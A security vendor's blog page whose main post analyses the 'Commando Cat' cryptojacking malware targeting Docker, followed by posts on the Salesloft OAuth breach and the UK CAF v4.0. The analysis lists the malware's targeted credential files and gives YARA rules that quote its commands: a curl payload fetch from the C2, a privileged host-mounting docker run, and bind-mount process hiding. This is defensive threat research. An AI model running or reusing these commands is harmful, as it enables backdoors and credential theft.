Blog
/
Cloud
/
January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
02
Jan 2024

Cado Security labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, a report which was published only a matter of weeks prior. [2]

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet by the IP 45[.]9.148.193 (which is the same as C2). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command.” 

It is likely used by the attacker to seem like a benign tool and not arouse suspicion.

The attacker then creates the container with a custom command to execute:

Container image with custom command to execute
Image 1: Container with custom command to execute

It uses the chroot to escape from the container onto the host operating system. This initial command checks if the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • Dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear - this service is not used anywhere in the malware, nor is it part of Linux. It is possible that the service is part of another campaign that the attacker does not want to compete with.

Once these checks pass, it runs the container again with another command, this time to infect it:

Container with infect command
Image 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. A common tactic of cryptojacking campaigns is that they will rename these binaries to evade detection, likely the attacker is anticipating that this box was previously infected by a campaign that renamed the binaries to this, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2, this will be discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Script
Image 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH key into the root user’s authorized_keys file:

function make_ssh_backdoor
Image 4

It then updates a number of SSH config options in order to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile variable to a local variable named “$hidden_authorized_keys”, however this variable is never actually defined in the script, resulting in public key authentication breaking.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely as an attempt to appear as legitimate. To continue this theme, the attacker also has opted to set the login shell for the “games” user as /usr/bin/nologin. This is not the path for the real nologin binary, and is instead a copy of bash placed here by the malware. This makes the “games” user appear as a regular service account, while actually being a backdoor.

Games user
Image 5

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

SSH details
Image 6

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Script
Image 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before, as an example, UNC2891 has made extensive use of TinyShell during their attacks on Oracle Solaris based systems [4].
The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, to then connect to the infected machine.

Script
Image 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Script
Image 9

This script works by cloning the Linux mtab file (a list of the active mounts) to another directory. It then creates a new bind mount for the /proc/pid directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to the /proc/pid directory to show an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount, making it harder to detect.

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. It’s purpose is likely for acting as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way - in order for nodes to find each other, they use their shared secret instead of IP address using the  service. This permits gs-netcat to function in virtually every environment as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victims IP and hostname:

Script
Image 10

This is more acceptable than tsh from a security point of view, there are 4 billion possible IP addresses and many more possible hostnames, making a brute force harder, although still possible by using strategies such as lists of common hostnames and trying IPs from blocks known for hosting virtual servers such as AWS.

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly to note, the attacker will use the cmd.cat containers to untar the downloaded payload, if tar is not available on the system or fails. Instead of using /tmp, it also uses /dev/shm instead, which acts as a temporary file store, but memory backed instead. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. This also results in the artefacts not touching the disk, making forensics somewhat more difficult. This technique has been used before in BPFdoor - a high-profile Linux campaign [6].

Script
Image 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware to obtain persistence; however not all systems use systemd, resulting in this payload being rendered entirely ineffective on these systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Script
Image 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Script
Image 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Script
Image 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as IMDS, and environment variables. Interestingly, the script creates a file so that once the script runs the first time, it can never be run again as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as making the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts that have been previously attributed to TeamTNT and could have been copied from one of their campaigns [7.] However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Script
Image 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber script. Firstly, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and the security credentials for it. The timeout is likely used to stop this part of the script taking a long time to run on systems where IMDS is not available. It would also appear this script only works with IMDSv1, so can be rendered ineffective by enforcing IMDSv2.

Script
Image 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, are then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Script
Image 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root file system for their name, and the results appended to a temporary file, before the final concatenation of the credentials files is read back into the CSOF variable.

CSOF variable
Image 18

Next up is get_prov_vars, which simply loops through all processes in /proc and reads out their environment variables into CSOF. This is interesting as the payload already checks the environment variables in a lot of cases, such as in the aws, google, and azure grabbers. So, it is unclear why they grab all data, but then grab specific portions of the data again.

Code
Image 19

Regardless of what data it has already grabbed, get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber, where it checks for the existence of a variable and then appends its contents (or the file’s contents if the variable is path) to CSOF.

Code
Image 20

The final thing it grabs is an inspection of all running docker containers via the get_docker function. This can contain useful information about what's running in the container and on the box in general, as well as potentially providing more secrets that are passed to the container.

Code
Image 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Code
Image 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes, to deploy an XMRig cryptominer, and to “secure” the docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. Firstly, it removes all containers that have a command of /bin/bash -c 'apt-get or busybox, and then it removes all containers that do not have a command that contains chroot (which is the initial command used by this payload).

Code
Image 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops & disables the services. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying their own miner, so that they aren't competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary, should a file with .upd be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name docker cache daemon to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm .

Code
Image 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” docker. First, it pulls down alpine and tags it as docker/firstrun (this will become clear as to why later), and then deletes any images in a hardcoded list of images that are commonly used in other campaigns.

Code
Image 25

Next, it blackholes the docker registry by writing it's hostname to /etc/hosts with an IP of 0.0.0.0

Code
Image 26

This completely blocks other attackers from pulling their images/tools onto the box, eliminating the risk of competition. Keeping the Alpine image named as docker/firstrun allows the attacker to still use the docker API to spawn an alpine box they can use to break back in, as it is already downloaded so the blackhole has no effect.

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 
meta: 

        description = "Detects CommandoCat aws.sh credential stealer script" 
 
        license = "Apache License 2.0" 
 
        date = "2024-01-25" 
 
        hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 
    strings: 
 
        // Constants 

        $const1 = "CRED_FILE_NAMES" 
 
        $const2 = "MIXED_CREDFILES" 
 
        $const3 = "AWS_CREDS_FILES" 
 
        $const4 = "GCLOUD_CREDS_FILES" 
 
        $const5 = "AZURE_CREDS_FILES" 
 
        $const6 = "VICOIP" 
 
        $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. https://www.cadosecurity.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

More in this series

No items found.

Blog

/

Cloud

/

September 8, 2025

Unpacking the Salesloft Incident: Insights from Darktrace Observations

solesloft incident Default blog imageDefault blog image

Introduction

On August 26, 2025, Google Threat intelligence Group released a report detailing a widespread data theft campaign targeting the sales automation platform Salesloft, via compromised OAuth tokens used by the third-party Drift AI chat agent [1][2].  The attack has been attributed to the threat actor UNC6395 by Google Threat Intelligence and Mandiant [1].

The attack is believed to have begun in early August 2025 and continued through until mid-August 2025 [1], with the threat actor exporting significant volumes of data from multiple Salesforce instances [1]. Then sifting through this data for anything that could be used to compromise the victim’s environments such as access keys, tokens or passwords. This had led to Google Threat Intelligence Group assessing that the primary intent of the threat actor is credential harvesting, and later reporting that it was aware of in excess of 700 potentially impacted organizations [3].

Salesloft previously stated that, based on currently available data, customers that do not integrate with Salesforce are unaffected by this campaign [2]. However, on August 28, Google Threat Intelligence Group announced that “Based on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations” [2]. Google Threat Intelligence has since advised that any and all authentication tokens stored in or connected to the Drift platform be treated as potentially compromised [1].

This campaign demonstrates how attackers are increasingly exploiting trusted Software-as-a-Service (SaaS) integrations as a pathway into enterprise environment.

By abusing these integrations, threat actors were able to exfiltrate sensitive business data at scale, bypassing traditional security controls. Rather than relying on malware or obvious intrusion techniques, the adversaries leveraged legitimate credentials and API traffic that resembled legitimate Salesforce activity to achieve their goals. This type of activity is far harder to detect with conventional security tools, since it blends in with the daily noise of business operations.

The incident underscores the escalating significance of autonomous coverage within SaaS and third-party ecosystems. As businesses increasingly depend on interconnected platforms, visibility gaps become evident that cannot be managed by conventional perimeter and endpoint defenses.

By developing a behavioral comprehension of each organization's distinct use of cloud services, anomalies can be detected, such as logins from unexpected locations, unusually high volumes of API requests, or unusual document activity. These indications serve as an early alert system, even when intruders use legitimate tokens or accounts, enabling security teams to step in before extensive data exfiltration takes place

What happened?

The campaign is believed to have started on August 8, 2025, with malicious activity continuing until at least August 18. The threat actor, tracked as UNC6395, gained access via compromised OAuth tokens associated with Salesloft Drift integrations into Salesforce [1]. Once tokens were obtained, the attackers were able to issue large volumes of Salesforce API requests, exfiltrating sensitive customer and business data.

Initial Intrusion

The attackers first established access by abusing OAuth and refresh tokens from the Drift integration. These tokens gave them persistent access into Salesforce environments without requiring further authentication [1]. To expand their foothold, the threat actor also made use of TruffleHog [4], an open-source secrets scanner, to hunt for additional exposed credentials. Logs later revealed anomalous IAM updates, including unusual UpdateAccessKey activity, which suggested attempts to ensure long-term persistence and control within compromised accounts.

Internal Reconnaissance & Data Exfiltration

Once inside, the adversaries began exploring the Salesforce environments. They ran queries designed to pull sensitive data fields, focusing on objects such as Cases, Accounts, Users, and Opportunities [1]. At the same time, the attackers sifted through this information to identify secrets that could enable access to other systems, including AWS keys and Snowflake credentials [4]. This phase demonstrated the opportunistic nature of the campaign, with the actors looking for any data that could be repurposed for further compromise.

Lateral Movement

Salesloft and Mandiant investigations revealed that the threat actor also created at least one new user account in early September. Although follow-up activity linked to this account was limited, the creation itself suggested a persistence mechanism designed to survive remediation efforts. By maintaining a separate identity, the attackers ensured they could regain access even if their stolen OAuth tokens were revoked.

Accomplishing the mission

The data taken from Salesforce environments included valuable business records, which attackers used to harvest credentials and identify high-value targets. According to Mandiant, once the data was exfiltrated, the actors actively sifted through it to locate sensitive information that could be leveraged in future intrusions [1]. In response, Salesforce and Salesloft revoked OAuth tokens associated with Drift integrations on August 20 [1], a containment measure aimed at cutting off the attackers’ primary access channel and preventing further abuse.

How did the attack bypass the rest of the security stack?

The campaign effectively bypassed security measures by using legitimate credentials and OAuth tokens through the Salesloft Drift integration. This rendered traditional security defenses like endpoint protection and firewalls ineffective, as the activity appeared non-malicious [1]. The attackers blended into normal operations by using common user agents and making queries through the Salesforce API, which made their activity resemble legitimate integrations and scripts. This allowed them to operate undetected in the SaaS environment, exploiting the trust in third-party connections and highlighting the limitations of traditional detection controls.

Darktrace Coverage

Anomalous activities have been identified across multiple Darktrace deployments that appear associated with this campaign. This included two cases on customers based within the United States who had a Salesforce integration, where the pattern of activities was notably similar.

On August 17, Darktrace observed an account belonging to one of these customers logging in from the rare endpoint 208.68.36[.]90, while the user was seen active from another location. This IP is a known indicator of compromise (IoC) reported by open-source intelligence (OSINT) for the campaign [2].

Cyber AI Analyst Incident summarizing the suspicious login seen for the account.
Figure 1: Cyber AI Analyst Incident summarizing the suspicious login seen for the account.

The login event was associated with the application Drift, further connecting the events to this campaign.

Advanced Search logs showing the Application used to login.
Figure 2: Advanced Search logs showing the Application used to login.

Following the login, the actor initiated a high volume of Salesforce API requests using methods such as GET, POST, and DELETE. The GET requests targeted endpoints like /services/data/v57.0/query and /services/data/v57.0/sobjects/Case/describe, where the former is used to retrieve records based on a specific criterion, while the latter provides metadata for the Case object, including field names and data types [5,6].

Subsequently, a POST request to /services/data/v57.0/jobs/query was observed, likely to initiate a Bulk API query job for extracting large volumes of data from the Ingest Job endpoint [7,8].

Finally, a DELETE request to remove an ingestion job batch, possibly an attempt to obscure traces of prior data access or manipulation.

A case on another US-based customer took place a day later, on August 18. This again began with an account logging in from the rare IP 208.68.36[.]90 involving the application Drift. This was followed by Salesforce GET requests targeting the same endpoints as seen in the previous case, and then a POST to the Ingest Job endpoint and finally a DELETE request, all occurring within one minute of the initial suspicious login.

The chain of anomalous behaviors, including a suspicious login and delete request, resulted in Darktrace’s Autonomous Response capability suggesting a ‘Disable user’ action. However, the customer’s deployment configuration required manual confirmation for the action to take effect.

An example model alert for the user, triggered due to an anomalous API DELETE request.
Figure 3: An example model alert for the user, triggered due to an anomalous API DELETE request.
Figure 4: Model Alert Event Log showing various model alerts for the account that ultimately led to an Autonomous Response model being triggered.

Conclusion

In conclusion, this incident underscores the escalating risks of SaaS supply chain attacks, where third-party integrations can become avenues for attacks. It demonstrates how adversaries can exploit legitimate OAuth tokens and API traffic to circumvent traditional defenses. This emphasizes the necessity for constant monitoring of SaaS and cloud activity, beyond just endpoints and networks, while also reinforcing the significance of applying least privilege access and routinely reviewing OAuth permissions in cloud environments. Furthermore, it provides a wider perspective into the evolution of the threat landscape, shifting towards credential and token abuse as opposed to malware-driven compromise.

Appendices

Darktrace Model Detections

·      SaaS / Access / Unusual External Source for SaaS Credential Use

·      SaaS / Compromise / Login From Rare Endpoint While User Is Active

·      SaaS / Compliance / Anomalous Salesforce API Event

·      SaaS / Unusual Activity / Multiple Unusual SaaS Activities

·      Antigena / SaaS / Antigena Unusual Activity Block

·      Antigena / SaaS / Antigena Suspicious Source Activity Block

Customers should consider integrating Salesforce with Darktrace where possible. These integrations allow better visibility and correlation to spot unusual behavior and possible threats.

IoC List

(IoC – Type)

·      208.68.36[.]90 – IP Address

References

1.     https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift

2.     https://trust.salesloft.com/?uid=Drift+Security+Update%3ASalesforce+Integrations+%283%3A30PM+ET%29

3.     https://thehackernews.com/2025/08/salesloft-oauth-breach-via-drift-ai.html

4.     https://unit42.paloaltonetworks.com/threat-brief-compromised-salesforce-instances/

5.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_query.htm

6.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_sobject_describe.htm

7.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/get_job_info.htm

8.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/query_create_job.htm

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead

Blog

/

Compliance

/

September 8, 2025

Cyber Assessment Framework v4.0 Raises the Bar: 6 Questions every security team should ask about their security posture

CAF v4.0 cyber assessment frameworkDefault blog imageDefault blog image

What is the Cyber Assessment Framework?

The Cyber Assessment Framework (CAF) acts as guide for organizations, specifically across essential services, critical national infrastructure and regulated sectors, across the UK for assessing, managing and improving their cybersecurity, cyber resilience and cyber risk profile.

The guidance in the Cyber Assessment Framework aligns with regulations such as The Network and Information Systems Regulations (NIS), The Network and Information Security Directive (NIS2) and the Cyber Security and Resilience Bill.

What’s new with the Cyber Assessment Framework 4.0?

On 6 August 2025, the UK’s National Cyber Security Centre (NCSC) released Cyber Assessment Framework 4.0 (CAF v4.0) a pivotal update that reflects the increasingly complex threat landscape and the regulatory need for organisations to respond in smarter, more adaptive ways.

The Cyber Assessment Framework v4.0 introduces significant shifts in expectations, including, but not limited to:

  • Understanding threats in terms of the capabilities, methods and techniques of threat actors and the importance of maintaining a proactive security posture (A2.b)
  • The use of secure software development principles and practices (A4.b)
  • Ensuring threat intelligence is understood and utilised - with a focus on anomaly-based detection (C1.f)
  • Performance of proactive threat hunting with automation where appropriate (C2.a)

This blog post will focus on these components of the framework. However, we encourage readers to get the full scope of the framework by visiting the NCSC website where they can access the full framework here.

In summary, the changes to the framework send a clear signal: the UK’s technical authority now expects organisations to move beyond static rule-based systems and embrace more dynamic, automated defences. For those responsible for securing critical national infrastructure and essential services, these updates are not simply technical preferences, but operational mandates.

At Darktrace, this evolution comes as no surprise. In fact, it reflects the approach we've championed since our inception.

Why Darktrace? Leading the way since 2013

Darktrace was built on the principle that detecting cyber threats in real time requires more than signatures, thresholds, or retrospective analysis. Instead, we pioneered a self-learning approach powered by artificial intelligence, that understands the unique “normal” for every environment and uses this baseline to spot subtle deviations indicative of emerging threats.

From the beginning, Darktrace has understood that rules and lists will never keep pace with adversaries. That’s why we’ve spent over a decade developing AI that doesn't just alert, it learns, reasons, explains, and acts.

With Cyber Assessment Framework v4.0, the bar has been raised to meet this new reality. For technical practitioners tasked with evaluating their organisation’s readiness, there are five essential questions that should guide the selection or validation of anomaly detection capabilities.

6 Questions you should ask about your security posture to align with CAF v4

1. Can your tools detect threats by identifying anomalies?

Cyber Assessment Framework v4.0 principle C1.f has been added in this version and requires that, “Threats to the operation of network and information systems, and corresponding user and system behaviour, are sufficiently understood. These are used to detect cyber security incidents.”

This marks a significant shift from traditional signature-based approaches, which rely on known Indicators of Compromise (IOCs) or predefined rules to an expectation that normal user and system behaviour is understood to an extent enabling abnormality detection.

Why this shift?

An overemphasis on threat intelligence alone leaves defenders exposed to novel threats or new variations of existing threats. By including reference to “understanding user and system behaviour” the framework is broadening the methods of threat detection beyond the use of threat intelligence and historical attack data.

While CAF v4.0 places emphasis on understanding normal user and system behaviour and using that understanding to detect abnormalities and as a result, adverse activity. There is a further expectation that threats are understood in terms of industry specific issues and that monitoring is continually updated  

Darktrace uses an anomaly-based approach to threat detection which involves establishing a dynamic baseline of “normal” for your environment, then flagging deviations from that baseline — even when there’s no known IoCs to match against. This allows security teams to surface previously unseen tactics, techniques, and procedures in real time, whether it’s:

  • An unexpected outbound connection pattern (e.g., DNS tunnelling);
  • A first-time API call between critical services;
  • Unusual calls between services; or  
  • Sensitive data moving outside normal channels or timeframes.

The requirement that organisations must be equipped to monitor their environment, create an understanding of normal and detect anomalous behaviour aligns closely with Darktrace’s capabilities.

2. Is threat hunting structured, repeatable, and improving over time?

CAF v4.0 introduces a new focus on structured threat hunting to detect adverse activity that may evade standard security controls or when such controls are not deployable.  

Principle C2.a outlines the need for documented, repeatable threat hunting processes and stresses the importance of recording and reviewing hunts to improve future effectiveness. This inclusion acknowledges that reactive threat hunting is not sufficient. Instead, the framework calls for:

  • Pre-determined and documented methods to ensure threat hunts can be deployed at the requisite frequency;
  • Threat hunts to be converted  into automated detection and alerting, where appropriate;  
